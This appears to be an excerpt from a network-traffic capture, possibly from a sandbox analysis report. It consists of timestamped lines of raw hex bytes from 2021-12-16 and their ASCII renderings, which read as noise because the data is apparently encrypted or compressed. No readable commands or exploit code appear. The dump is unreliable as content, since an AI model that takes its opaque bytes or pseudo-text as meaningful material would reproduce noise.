                                                        2021-12-16 12:20:36 UTC69INData Raw: e9 9f f1 7b bc 05 b6 eb a1 a5 e8 a8 59 61 08 b9 c9 e0 a4 66 ed 16 53 91 17 08 38 0d dd 3f a3 4b 0a fd 4c 4b 35 63 e2 4d 58 07 91 01 cf c9 2b 3f 83 af ad f6 91 28 4d f0 f2 09 93 c2 00 85 8c d3 0b 1d 62 53 6b c5 b3 0e db 26 4a b4 ae 95 1f ca 63 81 31 ae 3f 7b 4d 84 35 f0 89 b6 88 7d 04 ca 3c 89 51 59 6e c5 d7 93 02 ad 01 45 0a 76 81 bc ba 07 4d 3a ec d2 a0 c0 aa f0 8b b9 e1 5a 6c 45 12 9e 6e 62 13 ed 68 97 99 2d 78 b9 bf dc 10 0b c9 27 7d 8f 1d f0 f9 4d ad da 2a 37 27 3b d3 24 13 8c 71 ea f6 b8 91 3b 70 57 30 c5 c0 58 0e ad 28 56 96 88 f5 e1 96 03 54 61 92 3a 4c a1 0f dc d0 55 af 3e 56 b8 f8 b3 ef f6 46 21 81 cd 0b d6 57 2b dd fa 8f 80 c0 aa 21 86 93 04 d2 6c df cb 16 c5 96 0f 58 0b 98 e2 e3 d0 4e 18 6e 15 70 85 44 96 d6 09 6d 04 2b 7b 8c a3 c0 b5 51 32 36
                                                        Data Ascii: {YafS8?KLK5cMX+?(MbSk&Jc1?{M5}<QYnEvM:ZlEnbh-x'}M*7';$q;pW0X(VTa:LU>VF!W+!lXNnpDm+{Q26
                                                        2021-12-16 12:20:36 UTC70INData Raw: 5f df a3 05 8f c8 42 3d eb a7 e0 d8 e4 91 cd 05 4f b6 56 6e 19 ad 61 af c8 8f 4b 58 c9 1c 59 4d 5f 09 b4 1b cd 4b be 6f 58 75 a8 4f 57 aa 89 80 4b 69 d1 6f 9b 38 7c 31 85 22 4a b2 e6 1f 92 90 a3 31 aa ac a8 03 a8 88 09 70 a1 f0 09 a4 da 14 e8 12 9b 42 1a 5c 43 0c 39 06 ba 6e 41 9b bd 36 31 50 87 11 6c 13 16 cf 97 bd 67 8f ee 15 e6 4b 7b 2e 44 ba 2a 63 28 8b d6 d8 f2 6b 27 b7 de 81 d5 3c 3d cb e2 fa 3d 56 5e 68 c8 af 14 6b ec d6 7d be 52 ae a0 5c fd c3 05 ec a9 87 d5 7e d4 50 eb 0d bf d8 a9 4f 51 9f 83 72 87 ba 46 92 a7 cc a0 d3 f8 e8 07 67 15 bc f7 65 af fc e9 91 52 36 2b 63 43 40 26 ae fd 29 46 28 66 d5 2d 6b f7 ba da b1 8f aa 17 e5 77 9d 55 1d 2f 4b 8d 32 96 a8 3d 59 3d 13 7f bb ce 28 bb c9 42 af 03 76 9c 3c 2e 9a bb 91 b3 17 7b c6 99 36 60 46 4f 58 9d
                                                        Data Ascii: _B=OVnaKXYM_KoXuOWKio8|1"J1pB\C9nA61PlgK{.D*c(k'<==V^hk}R\~POQrFgeR6+cC@&)F(f-kwU/K2=Y=(Bv<.{6`FOX
                                                        2021-12-16 12:20:36 UTC71INData Raw: b3 e3 cc 6a 0d 57 7a b4 7f 38 ae 9e e5 32 b3 a6 e2 b5 6e ee 7c 5e 9a 99 b5 7f 06 de 3f af 24 7c d5 62 4d 23 74 85 60 d4 b0 e9 60 de d8 40 ab 35 87 b2 e6 85 35 99 f5 f7 10 8e 5d a2 75 5c ec b6 e7 13 1b ac cd 2a 6f e0 39 5a be b5 97 27 85 95 11 eb a9 15 71 5e 81 56 d9 88 b6 82 5b 0c 15 36 9c 32 6f 6f c5 dc 91 3b bc 6e 47 09 76 8b 35 a2 8a 77 2c ff db 8b df b6 7d a0 b9 f0 53 61 be 1a a3 6e 7a 9a 41 5f fa 04 32 7b bb b3 ca 10 09 d8 57 cb bd 3e fb 75 66 a7 cb 2f 3a 31 27 d6 32 3b 88 78 f5 f3 57 99 06 22 29 1e d5 c6 5b 0e a2 a8 44 a6 be 96 e8 8d 14 cc 16 e3 20 2e cb 0d ca d5 d2 b6 ef f8 b5 b7 bb fe fa c4 38 f6 cd 68 b6 54 2b dc 04 8b 91 9f b7 4e ee 90 cb c1 d8 e8 dc 49 dc ff 7c 5a 32 b0 71 fc 96 1b 2b 35 75 79 9e 9c 07 f0 a3 6d 04 6a 38 91 c0 a0 01 cd 2d 26 d7
                                                        Data Ascii: jWz82n|^?$|bM#t``@55]u\*o9Z'q^V[62oo;nGv5w,}SanzA_2{W>uf/:1'2;xW")[D .8hT+NI|Z2q+5uymj8-&
                                                        2021-12-16 12:20:36 UTC72INData Raw: c6 ad 0b 91 f1 fc 0c 2a 73 da 65 d7 91 cb 27 d9 98 54 64 14 bf 53 bf 73 8f 41 8c ed a2 17 4c 59 2b 02 74 d6 40 b2 6d 5a 53 82 4f 5d 93 2f 91 4b 69 d6 47 9a 38 31 46 a8 37 56 bf 3b 84 88 a0 ab 36 fb 24 a9 03 3b 9b 0d 70 d6 62 5a a0 d0 18 f4 6b 9b 42 16 7d 4c 22 48 df c7 69 69 e6 af 27 33 17 99 13 6c 13 72 ea 85 b2 7e e5 d6 5b e7 41 73 17 3e af 2f 73 6f 7d d3 d8 f2 50 b7 9c 94 86 a6 c9 2d cf f9 90 2a 3b d7 63 c0 81 07 f7 ec d0 5f 2d 51 a6 8e 69 68 c0 03 fb dc 50 f3 7e de 35 c3 20 bf d2 ab 5e d3 9b 83 74 be 3c 6a 95 a1 e4 1d c3 f0 ff 7c a1 f8 bc fd 0a be f6 fd b3 cd 1a a9 61 55 cb 09 2d f9 28 54 14 e4 fe 8e 6d 84 4f cf 99 5c c6 17 e1 61 1a 5a 35 ad 4e 99 20 aa 03 9a 59 3b 31 d3 23 ce 2e c2 27 47 87 07 18 9c 38 3d 99 a2 b1 22 3b ec c4 b1 b3 72 cb 4e 70 1b bc
                                                        Data Ascii: *se'TdSsALY+t@mZSO]/KiG81F7V;6$;pbZkB}L"Hii'3lr~[As>/so}P-*;c_-QihP~5 ^t<j|aU-(TmO\aZ5N Y;1#.'G8=";rNp
                                                        2021-12-16 12:20:36 UTC74INData Raw: 75 ec 98 07 38 5c 2a 6e 30 a0 84 f3 14 25 d8 ef a8 62 c4 92 5b 98 99 23 01 20 c3 32 89 e4 6d fd 4c d3 32 7c f5 4a f6 7f ef 66 cf 55 3e bf 2b 88 a7 c1 0d 33 41 f9 f3 1e eb d0 a6 f5 f4 c2 2b c7 ec e4 bd 5b 2c b7 ec 21 54 ca 38 95 17 c4 78 f1 4f 33 2e 7f 41 94 59 bb 14 a7 8c 71 18 c4 0d 02 2f 7b 70 d3 fd 57 0b ba 6e f4 1a 78 94 b4 82 71 66 3a ec 4f a2 c4 ab 65 80 62 e1 5b 7f dc 0a 81 7b 72 82 3e dc a5 96 32 68 88 1d ca 01 01 5c b8 c4 8e 2e fa b3 d1 b6 c5 31 35 16 ed c5 3a 3b 05 61 e4 e3 b4 87 70 e6 29 14 db de 49 83 b5 37 4c e6 bc a7 7d 8d 1c 50 11 ac b6 67 ab 04 da c0 4d bd be f7 f7 4f b2 ef fc c9 37 a7 cd 15 d9 c1 2b d4 8d 8b e9 5c b1 23 97 b9 14 c7 49 f7 60 07 cb 86 03 24 bf a7 ee f8 c9 07 ac 47 1b 6c 90 d6 0a c1 2d 70 1b 2d fb 9d ad de 95 a8 32 36 c4 3c
                                                        Data Ascii: u8\*n0%b[# 2mL2|JfU>+3A+[,!T8xO3.AYq/{pWnxqf:Oeb[{r>2h\.15:;ap)I7L}PgMO7+\#I`$Gl-p-26<
                                                        2021-12-16 12:20:36 UTC75INData Raw: ac 16 8c cf 40 82 9d 16 a9 f0 d3 9b ca 81 d0 b6 01 7a 35 bc 44 97 c1 96 bf 87 e9 26 11 4a 49 05 32 c3 b9 11 be 65 78 7a 0c f8 79 6e 92 9d 4b 60 c9 91 aa 14 38 56 08 1b 50 b2 e7 14 90 ad ab 38 92 57 a9 2f 39 9c 23 7a df 4a 00 b3 2e 1f b7 ee 82 4f 10 59 5d da 44 2e b8 7f 64 e6 b0 2a c9 79 3d 10 47 17 4e b3 91 97 6d e0 f5 27 ef 41 82 07 3a be 8a 65 00 e5 a1 62 f4 43 bb bf c1 9b 8e 78 3c cb e2 9f 3b 7c fe 66 c0 81 40 d1 ec d0 5f 4d 4f ac a6 7e 66 c9 6a f0 d8 78 de 53 d2 17 4a 0b bf d4 89 7c 2d 9b 89 73 85 32 6a 30 a5 e4 30 bf e4 ec 74 92 07 b0 eb 19 a4 c6 75 9a 5a 1e b8 6b 52 4d 94 3e fd 38 44 6f ed d4 2d 67 97 4b cd a2 88 fd 64 e6 77 97 4c 3b bc 42 17 27 b8 3a 3f 36 b4 3a fb b5 e6 8d cc 36 45 87 b7 19 9c 34 3d 95 a2 bc 1e 22 7b c0 bb 8c 23 47 49 70 68 67 dc
                                                        Data Ascii: @z5D&JI2exzynK`8VP8W/9#zJ.OY]D.d*y=GNm'A:ebCx<;|f@_MO~fjxSJ|-s2j00tuZkRM>8Do-gKdwL;B':?6:6E4="{#GIphg
                                                        2021-12-16 12:20:36 UTC76INData Raw: cc 6b 1c 08 58 b6 51 3e bf 8f cc 23 b9 d8 c9 20 6e e4 0d 59 b0 f0 be 10 24 c8 28 81 a0 6c fd 46 20 38 73 ea 4e dc 6e fd 4e f8 c9 2f bb 1c a9 ba f7 97 28 67 de e3 01 90 92 b7 fd c1 d3 0b 18 fc e4 bd c7 3d b9 f3 29 51 b4 b6 9e 19 db 6a f5 24 ab 3f 52 5e 80 46 f9 88 b6 93 46 9a db 35 94 3c 61 79 ed 48 83 0b b0 01 73 0a 76 81 a9 7c 86 4e 0d ec d3 b9 e2 8c 7d a0 b3 3f 5b 79 6a 1b 8e 74 6b 9d 5a 40 b4 98 38 67 a8 b7 d0 01 01 c1 b7 c8 b9 2a e7 f8 47 8d d8 1e 2a 36 96 c7 3a 3b 3a 70 ea ed bf 95 12 e0 3a 1a c4 c0 5b 00 bd c7 52 d5 b6 f0 c9 a6 17 5d 08 aa 13 62 ab 04 d1 c5 03 67 b1 e1 d7 c8 a8 e2 fc 5c 39 b1 24 0b fa 55 02 af 97 94 81 df b9 20 8e 90 c5 d3 b7 f6 d0 18 15 87 1c 53 21 9e f4 e3 d6 4e 3c 49 00 7d 8f 93 89 df dd 6c 28 62 5f c3 a1 c0 b5 4e 22 3b c4 a9 bb
                                                        Data Ascii: kXQ># nY$(lF 8sNnN/(g=)Qj$?R^FF5<ayHsv|N}?[yjtkZ@8g*G*6:;:p:[R]bg\9$U S!N<I}l(b_N";
                                                        2021-12-16 12:20:36 UTC77INData Raw: 14 8b ca 77 0e 2a 51 f2 f0 d3 99 cd 0f 76 8e 5f 45 04 a0 4e 80 36 8e 6d 84 dd 3f 13 4b 49 fd bd 58 d4 5d b5 65 75 64 7c 4e 7b a8 a3 92 60 8a d3 14 c3 38 31 48 af 12 52 b1 9b 76 89 a0 af 1b 88 a9 a8 10 0d 8a 09 49 d2 4a 09 a2 d0 1e 8a fa 91 69 0b 50 4c 33 bb 03 96 6a 71 ed b9 31 21 86 10 3e 6e 02 6e 30 91 a5 93 e1 c2 15 cd 43 58 e5 38 c5 43 65 00 f0 f8 fa f6 40 cc dd de 87 a2 e9 3c cb e8 86 0d 56 5e 4a c0 87 68 69 ec d0 44 28 5d 85 bd 74 6c d7 fb eb f6 7a cc 75 de 38 fd f1 be fe a3 70 24 9b 84 6c 51 3a 6e 90 8a e6 1d 33 fa 95 1e 98 14 b8 d7 28 ad fd 94 f1 5a 1e ad 4d 43 46 0e 3e c9 2b 40 28 f0 d6 2d 6b 84 45 ca a7 8e ee 0c e7 70 80 a3 34 81 4d 95 3f be 2c 2f a7 3a 17 f9 a8 c5 2e cf 2e bd ae 25 1b b7 3c 05 73 b1 c2 5d 13 7b c4 9b 97 66 45 34 1b 1b bd d9 b3
                                                        Data Ascii: w*Qv_EN6m?KIX]eud|N{`81HRvIJiPL3jq1!>nn0CX8Ce@<V^JhiD(]tlzu8p$lQ:n3(ZMCF>+@(-kEp4M?,/:..%<s]{fE4
                                                        2021-12-16 12:20:36 UTC79INData Raw: 6a 07 2b 6c b4 7f 16 bf 8f ec b2 b9 c9 f0 a1 65 cf 1c 5b 9f 8e 41 11 02 de 27 a2 35 6a eb b2 4e 0f 70 fd 4f d6 b7 f7 98 ce e5 2d 9a 36 ac 5b f5 ea 58 4f e6 e7 2b ac 4e b4 d3 fa d3 0b 13 91 9e bd c7 39 93 f3 33 58 84 a7 84 6a db 6b ee 14 af 3f 71 5c a8 51 d9 88 bc 81 43 06 f3 08 9b 3e 73 1c ec df 82 01 c0 6c 1b 5a 77 8b a5 cd c9 67 3a ea d1 b0 e2 f5 78 a0 bf 8e 70 7d 40 11 e0 5f 6a 9d 5c 42 db da 2c 72 ae b8 e2 3f 04 c0 af a5 ba 37 e5 f2 22 f4 ca 2e 2f 34 51 87 3b 3b 9f 73 c2 c3 ac 98 2c 15 13 18 c4 ca 3d 4a a5 39 55 fb cc b6 e0 9c 14 5e 26 fc 3e 4c ad 6b f0 d1 43 a6 df b6 d6 d7 b4 c5 e2 46 16 ab da 22 d6 5d 3a d2 95 94 90 d6 ab 06 95 99 dd d0 b7 f6 d0 14 dd 97 1c 54 35 48 e1 cf d4 53 3b 56 12 68 71 9b ba d2 08 6f 2f 89 65 f7 d8 c0 b5 55 18 14 c6 a3 d9 27
                                                        Data Ascii: j+le[A'5jNpO-6[XO+N93Xjk?q\QC>slZwg:xp}@_j\B,r?7"./4Q;;s,=J9U^&>LkCF"]:T5HS;Vhqo/eU'
                                                        2021-12-16 12:20:36 UTC80INData Raw: 94 91 db 0a 37 66 cc 6c d5 8f d2 47 fb 9e 4b 67 00 dd d5 91 d7 85 5e b8 59 32 0c 47 40 09 20 72 c9 46 a1 07 ee 7a 9d 42 4a 36 8e 8f 45 49 0c 6f ab 38 ad 4a 9a 3f 4f 94 7a 18 96 b0 8b d7 88 a9 a8 9f 3b 97 18 7e b5 d6 0f bb c2 3e 1a ec 9a 42 8c 56 54 37 5c 9e bc 77 7d c6 5e 36 37 78 8d 14 73 00 45 82 96 bd 6d 7c e8 08 f0 5e 60 9a 3c a1 3d 45 a5 f4 d2 d8 68 45 ae ac fe 37 a6 c3 3c 57 ee 8a 24 4b 27 fe c6 98 72 4f 02 d0 55 3e ca a8 b9 6f 74 8f 99 ec c5 64 cb 71 42 39 f4 12 a0 93 3d 61 30 85 9c 61 33 3d 5d 8d 81 09 36 d0 f8 72 72 87 34 a3 86 96 a9 e1 c8 84 4e 82 af 78 61 66 82 2d f9 29 dc 06 ef f5 0d 88 84 45 db 2d 83 da 33 f8 3c 0b 5b 2a 88 50 cb a8 b8 34 1f 46 36 a7 fd a0 e9 0e 09 36 43 af 95 1f 83 16 0e 1e b3 b9 36 8f 7d df 98 95 9a 46 49 70 87 bb c2 b3 73
                                                        Data Ascii: 7flGKg^Y2G@ rFzBJ6EIo8J?Oz;~>BVT7\w}^67xsEm|^`<=EhE7<W$K'rOU>otdqB9=a0a3=]6rr4Nxaf-)E-3<[*P4F66C6}FIps
                                                        2021-12-16 12:20:36 UTC81INData Raw: f9 39 70 bf 47 5d 40 70 13 3c b2 da ea b7 7f ef 19 a5 99 b5 85 02 27 cd 39 81 45 6c fd 4a 5e 2a 06 cb 44 d6 ab e5 72 e7 48 2d b1 32 91 35 f0 91 22 4e f2 f7 15 b2 ef b7 fb e1 c4 87 26 ec e4 bc ef 8b b9 f3 39 63 ee a4 84 13 d0 74 e7 07 a4 3f 60 55 9f 4a 27 89 9a 9d 7f 0a dd 24 96 a4 5d da c1 dd 84 23 0c 6a 68 0d 6d a3 cc a3 8a 60 55 c4 d1 b3 cc ab 70 b3 b2 e1 4a 74 5f 0b 71 65 47 97 4b 48 a3 4e 3e 7a b7 aa d9 0a 01 d1 a2 d5 9c cb e4 d4 64 b6 cc 28 38 3e a4 ed 8d 3f 99 76 c2 44 ad 98 2c 6c 10 75 c5 c0 54 37 cd 38 53 f3 8b 99 e0 9c 14 32 28 be 3b 4a b4 0a c8 d8 43 bd bb f7 29 d6 9e ec eb 46 2d a9 cb 01 c9 4f c4 db b9 96 aa c5 98 0a 70 66 25 ce 63 f7 ef 26 c0 9c 55 53 23 b6 4b e3 d6 55 26 5a 3e 41 8f 92 8e 2e 22 41 0b 68 19 2a a3 c0 b1 47 1a a3 c5 a0 ae 57 85
                                                        Data Ascii: 9pG]@p<'9ElJ^*DrH-25"N&9ct?`UJ'$]#jhm`UpJt_qeGKHN>zd(8>?vD,luT78S2(;JC)F-Opf%c&US#KU&Z>A."Ah*GW
                                                        2021-12-16 12:20:36 UTC82INData Raw: 28 52 17 0a a0 d4 64 fc c6 e0 3a 41 81 e1 14 6a cb 30 b1 13 0d d5 f0 f6 a5 19 5d 3e 4c a6 31 f7 0b 6e ba 51 d9 f8 2f 97 58 d2 68 89 ef 9e 9f 4f ca d9 1c 27 4a f4 22 2a 39 03 d4 f2 74 49 7b 4c 05 87 90 c8 27 92 33 f6 8c 41 75 c7 46 12 91 25 8c 3c 39 d4 f9 1f 08 96 28 76 28 4a f1 25 5e ab b9 b5 06 b2 09 33 0a 66 9c 2e 61 4b 04 bc 28 63 00 17 af 7a d9 d8 00 31 9f 93 e9 79 3a fa 6e 4c ff b3 51 cc 6a 0d 2e 72 96 7c 40 2c 8f ec 29 af e1 cf b7 6e ee 11 68 9a b2 b0 14 50 4f 3f a9 3f 7b d5 62 4f 23 78 fc 77 dd 98 c1 64 cf cf 25 6c 9b 85 b8 f7 92 31 48 95 5f 01 9a 46 bc ea ec c0 1a 0f ff f4 ac d6 52 70 f3 33 41 a7 b6 af 07 ca 7a ff 04 c0 db 70 5e 8a 55 d2 8f a4 89 46 34 d9 35 94 51 b9 6f c5 d7 93 1b ad b8 7b 1b 67 9b b2 b0 b8 ba 49 50 d3 b3 c0 b9 6b a7 d6 db 59 7f
                                                        Data Ascii: (Rd:Aj0]>L1nQ/XhO'J"*9tI{L'3AuF%<9(v(J%^3f.aK(cz1y:nLQj.r|@,)nhPO??{bO#xwd%l1H_FRp3Azp^UF45Qo{gIPkY
                                                        2021-12-16 12:20:36 UTC83INData Raw: dc 5a 73 9f 0e 92 40 ab a7 50 b8 93 44 7a e8 b9 38 3d 6e ba 7c 12 96 10 15 2d bc f5 d2 bb b6 83 d8 14 52 a6 95 ed f2 02 ed 15 b2 dc 64 b3 d8 e9 96 ae 84 22 c0 70 fd 49 da 6e 33 3a bc 1b 3e d4 bb 46 56 21 d4 59 79 b4 f9 9e 4e 2e 87 f8 57 51 fa c1 46 25 b9 ac 5b 32 b5 7c cd 80 1a 37 4c c9 b2 a6 95 05 0e 61 66 ff 89 d0 be 26 47 36 be 18 c2 3b ad e5 53 af 9a 67 62 d3 55 76 9a 31 50 33 3e db 7d 25 34 cf 6d 17 27 79 fb e8 2d 90 e1 02 64 9a 2f a8 1f a0 4d 19 7f be 94 9f c8 34 1a 55 a1 02 90 70 c0 60 a4 68 72 75 94 b1 56 86 8a 87 46 69 d8 73 55 39 1d 4e ae 35 68 cc 19 e1 76 a7 bc e7 83 ae a0 32 8c 8b 17 b7 f8 4a 09 a4 c3 2e 9d ec 37 43 10 50 f8 24 45 13 ac 7b 60 de 66 36 37 78 11 03 65 0d 9b 31 ba b7 69 f7 38 e9 ed 43 73 1f 29 b7 2a 74 09 e3 2c d9 d8 40 a9 a7 d7
                                                        Data Ascii: Zs@PDz8=n|-Rd"pIn3:>FV!YyN.WQF%[2|7Laf&G6;SgbUv1P3>}%4m'y-d/M4Up`hruVFisU9N5hv2J.7CP$E{`f67xe1i8Cs)*t,@
                                                        2021-12-16 12:20:36 UTC85INData Raw: 13 04 0e b3 3b 60 a3 94 e0 2d 24 9e a0 16 60 e9 01 a5 85 74 9c e8 e5 ab 31 0f 38 56 52 39 cc 86 3d 07 53 d9 f2 01 ce 38 d5 b4 a0 54 08 ec 0d a9 f9 e9 0f 09 f6 7d 41 3d 01 51 85 36 5a 7f 5e d3 c5 be d8 2f ac 18 c3 8e 4b 76 f5 e8 a7 fe 37 87 25 20 ad 2f 0e 0c 84 c9 49 17 46 e6 27 55 b4 ec 4f 1c 60 01 27 cb 4d 9e 05 f5 07 3d b3 33 42 0c 0e ba 79 f5 ee ad 32 ec c3 e9 07 a3 e3 04 35 ab 99 7f c6 42 44 3a 5c bc 57 7a bd 8f e6 3b d6 4d e0 b7 68 97 46 59 98 93 c1 55 2c dc 35 81 73 6f fd 46 67 68 70 ea 4e dd aa fc 69 cf d8 20 a9 ca 86 94 e4 93 59 89 e6 e3 05 99 c8 26 e4 e6 93 d8 11 ec e4 a4 d4 32 b9 e2 3c 54 ae 5a 85 35 c3 69 ff 1c 87 65 71 5e 8a 29 58 89 b6 84 e2 32 db 35 9f 2d 73 70 de ce 8d 0b ab 61 77 30 88 8a 8f ab b2 a7 3b ec d3 ac f6 a7 72 a0 a8 ee 44 4c be
                                                        Data Ascii: ;`-$`t18VR9=S8T}A=Q6Z^/Kv7% /IF'UO`'M=3By25BD:\Wz;MhFYU,5soFghpNi Y&2<TZ5ieq^)X25-spaw0;rDL
                                                        2021-12-16 12:20:36 UTC86INData Raw: 40 78 95 77 c1 bc aa 81 7a e9 9a 44 77 f2 3c fe 11 6c 95 0d 7e 77 12 64 a9 f4 f7 d6 9b bc c8 d9 69 f4 c9 10 e8 d8 04 f2 5f b2 e3 67 a2 42 f6 b9 50 37 0e c9 59 49 b9 1d ec 2c 0a af 14 37 de 4a 58 38 c3 d7 0e 8c b6 fa e9 08 bd a7 72 4e 3b 89 dc 64 a5 b3 84 18 0b d6 76 e5 c4 1f 1d 5a dc dd 2b 83 fb 09 3e 25 e5 84 da c9 79 bb 37 98 29 87 3a b3 39 4c af ae 6f 76 de 2e a1 95 2e 46 43 88 e0 ea 16 f0 10 47 0c 2e 71 e3 f4 05 1e e6 0f 67 9a 56 68 93 e6 49 97 c9 9e 49 80 49 72 13 4c 5e 2b 0a 74 d6 40 96 53 73 7c 88 58 db 95 88 90 4a 41 e7 6e ab 32 19 16 85 30 5a a3 e0 36 d3 a0 ab 3b e7 2b a9 03 3b f5 d8 61 d2 4e 16 b7 c3 11 9b fd 95 5d 1d ae 4a 08 58 01 c9 29 6b e6 b3 29 53 12 62 50 6e 15 6f 18 da bf 6d ea f8 2c 38 43 73 06 25 b0 39 6a 00 e5 dd c7 d0 bd b0 98 d2 96
                                                        Data Ascii: @xwzDw<l~wdi_gBP7YI,7JX8rN;dvZ+>%y7):9Lov..FCG.qgVhIIIrL^+t@Ss|XJAn20Z6;+;aN]JX)k)SbPnom,8Cs%9j
                                                        2021-12-16 12:20:36 UTC87INData Raw: 06 04 b0 3c f3 a3 94 e0 2d 24 9e a0 16 60 e9 20 f7 11 07 d4 e3 f2 37 ae 23 22 57 58 3a a6 c3 4e 45 55 c6 ca 3a 82 3a c4 b1 b6 6b 60 9e 63 a2 c1 d7 d0 b5 0b 62 63 27 17 c7 e7 7b 47 64 aa fa aa a0 d1 34 8d 5e d0 86 69 25 ef 7e 1a 80 29 ae 7f 2a d0 f3 61 8e 81 d6 71 9b 56 fa 25 55 ab b9 be 0b b2 09 33 0b 5a 8d 0a ea 53 21 a3 7e ad 02 3b 46 53 dc e0 3d c2 60 7d c1 07 b2 ca 69 46 98 9c 7f cc dc 07 38 4d b4 04 f8 bf 8f e8 20 3d 58 fe ba 2e a0 01 5b 98 9b bc 63 6f de 3f a3 2c 07 8e 0e 4d 23 78 c2 07 d4 b0 e5 4e 8b cb 2f bb 2c e8 3c f6 91 24 3c a7 e1 01 90 32 f2 f9 eb d9 23 5f ee e4 b7 4b dc b9 f3 32 47 a2 a9 86 62 10 6b ee 10 83 7a 73 25 4b 46 d9 8c 38 35 63 0f d9 4e 55 3e 75 6b b1 5f 82 0b bb 6c 13 c0 76 8b a7 2c 3d ea 05 ec d3 b2 c2 9c 4b a1 b9 eb 73 25 40 1b
                                                        Data Ascii: <-$` 7#"WX:NEU::k`cbc'{Gd4^i%~)*aqV%U3ZS!~;FS=`}iF8M =X.[co?,M#xN/,<$<2#_K2Gbkzs%KF85cNU>uk_lv,=Ks%@
                                                        2021-12-16 12:20:36 UTC88INData Raw: 4b c1 0b ff 75 aa 8b 56 a6 89 42 ab 7f 6d 39 11 6e ea ae 39 75 16 7f 8c 94 e2 d7 91 9e 83 a0 af fe a6 91 ee ab 43 ef 15 ab fd 6f c0 0f eb 96 a4 1e 61 c2 61 e1 55 e6 60 74 38 bc 11 1f 8c 47 47 70 15 92 20 bf be e8 9f 58 b2 28 51 57 51 f8 e5 ab a5 b9 a8 ec 66 ce 7d cd 8a bf 25 7a c5 b2 af 80 80 c7 4d 64 e3 f7 91 b5 3c b3 2e f8 72 83 3a b3 39 77 e8 b3 2c 6f c7 6e bd 9b 31 54 bf f2 07 a7 14 8f d0 56 0a fc f6 d8 f0 d3 93 b6 df 67 98 50 7f 12 88 03 95 c8 85 43 fd 03 34 13 48 58 70 fd 76 d6 40 af 6d 01 3e 80 4f 5d 82 cb 92 4b 63 c0 6b d8 7f 33 4c 8f 18 13 b0 e6 14 a1 e4 a9 31 82 b8 ad 12 30 07 20 61 d2 48 72 69 d0 1e 9f 5b f5 5a 11 50 41 86 7d ad ba 68 69 e4 c2 fd 37 78 15 1b 7d 13 b3 bf bc bd 6d e2 95 c7 e6 41 77 17 37 96 60 64 00 fe d0 a3 32 43 b1 b0 d9 f4 e7
                                                        Data Ascii: KuVBm9n9uCoaaU`t8GGp X(QWQf}%zMd<.r:9w,on1TVgPC4HXpv@m>O]Kck3L10 aHri[ZPA}hi7x}mAw7`d2C
                                                        2021-12-16 12:20:36 UTC90INData Raw: 18 35 15 65 d0 d7 f4 05 85 b6 e3 1e 4c 81 0e a2 17 01 cf ee 7f b5 31 f1 39 56 5e 28 56 17 4e 45 50 ca f2 38 87 2c c3 32 96 4c 9e 9e ed ba f3 f4 36 4f dc 6c 4b 34 12 65 e7 7e 4b 76 45 f2 92 a8 c0 a8 ab 5c c1 8f 52 74 fe 75 06 87 b3 97 2e 3d c7 65 1f 07 a8 75 77 04 43 f7 3d 4d 3b 84 ba 0c 45 1f 85 20 5c 9e 05 e0 51 2b 94 22 53 03 1d e6 7e c8 dc 35 25 b7 4e ef 07 af ed e3 41 e9 9b 7e df 60 16 32 4a 9e b2 3a bf 89 4e 32 b3 dd f5 a3 46 47 07 5b 92 8f 33 2f 2e dc 3e bf 1d 99 fc 4c 45 0f 70 c1 01 d4 b2 94 aa cf c9 2b c5 b6 87 b8 f6 80 26 58 30 6e 14 9a 4c b6 d3 a5 d1 0b 13 98 c5 bd c7 26 c4 3f 33 4b b0 a6 ff d5 db 6b ea 05 ab 39 60 5a 1a 6e 45 88 b6 88 cc 1c df 22 48 2d 71 7e c1 cc 8a 35 f7 90 97 f4 74 89 d8 6b 8a 66 3e eb 5c 98 ca b4 7f db 6c e1 5b 7b 57 71 55
                                                        Data Ascii: 5eL19V^(VNEP8,2L6OlK4e~KvE\Rtu.=euwC=M;E \Q+"S~5%NA~`2J:N2FG[3/.>LEp+&X0nL&?3Kk9`ZnE"H-q~5tkf>\l[{WqU
                                                        2021-12-16 12:20:36 UTC91INData Raw: 1f 21 26 bf aa 81 2c 93 98 44 77 f8 28 8a 10 6c 9b 6d 3d 64 16 01 35 bd f5 dc 1f 23 97 e0 06 ff a6 95 f8 dc 6d 59 14 a1 e6 74 a1 5b fa 87 96 65 23 c0 61 fa 56 f3 02 a9 29 b0 0a 33 de 49 28 c9 3c d6 28 ac be ed 89 42 b8 af 69 5b 79 de 9e 66 af af 8c 42 09 d4 7c df 8b 35 89 51 c4 b4 bc 8b db 0e 4c 64 e7 09 fb b7 3c b8 24 9f 21 c0 39 b3 33 d2 8f b1 2c 64 c2 29 a1 91 19 eb bf 89 ca b1 02 98 ca 55 1f 3b 74 d2 f0 d2 91 cd 1c 73 8a 40 46 89 a1 49 91 db 86 50 8d ed e4 17 4c 59 15 aa 67 c2 58 aa 74 75 5c 82 4e 57 aa 9b 83 59 7a f9 f9 aa 38 37 5f 8c 43 72 b0 e6 18 9a a8 ba 39 99 a5 c7 2b 3f 88 0f 77 c1 4f 1f b5 dd 90 2c fb 40 51 05 43 45 0f 51 13 b7 79 67 77 af 18 25 69 14 05 ba 06 60 21 98 aa bb f3 e0 06 e8 50 66 37 dc af 27 11 82 f4 d2 d9 e5 46 a6 6e c9 51 2b e8
                                                        Data Ascii: !&,Dw(lm=d5#mYt[e#aV)3I(<(Bi[yfB|5QLd<$!93,d)U;ts@FIPLYgXtu\NWYz87_Cr9+?wO,@QCEQygw%i`!Pf7'FnQ+
                                                        2021-12-16 12:20:36 UTC92INData Raw: aa 2c 74 d6 c0 1c 2e 24 b0 cf 03 48 31 0c b3 15 16 d8 66 99 a1 19 4d 12 48 59 30 d1 63 17 47 51 d3 82 20 a7 3a d5 ad 99 4a 9e ee 4f ab f9 5c 27 4a e5 6b 46 37 1c d3 e0 66 5b 69 7c 92 86 bc de 36 80 4d c5 98 bf 7c e5 78 3c 86 07 54 21 2a d6 e8 0a 80 fc d6 77 05 61 f8 37 5a a1 db e8 1f 4c 02 65 01 5a 44 12 3c cf 05 bc 33 52 10 12 47 7c c8 dd be 34 11 35 f9 04 bf d2 07 46 e9 9d 6c c8 7b 03 2e a2 b5 74 39 93 98 c4 f1 bd c9 e7 a6 6a 68 7b 5b 98 98 97 0e 2f dc 35 da 6c 6f fd 46 35 32 77 c0 44 d6 b0 fc 56 ca c9 91 b0 34 87 78 f7 91 33 59 f5 e9 39 35 4d b7 fb eb c2 01 06 f9 1a bc eb 36 b1 e2 36 c5 03 72 88 06 cd 78 e4 14 be 35 6c a0 81 6a d3 99 b2 b8 bf 0d db 35 80 2d 7f 6f d4 d7 98 f5 bb 42 6e 1d 65 8d b8 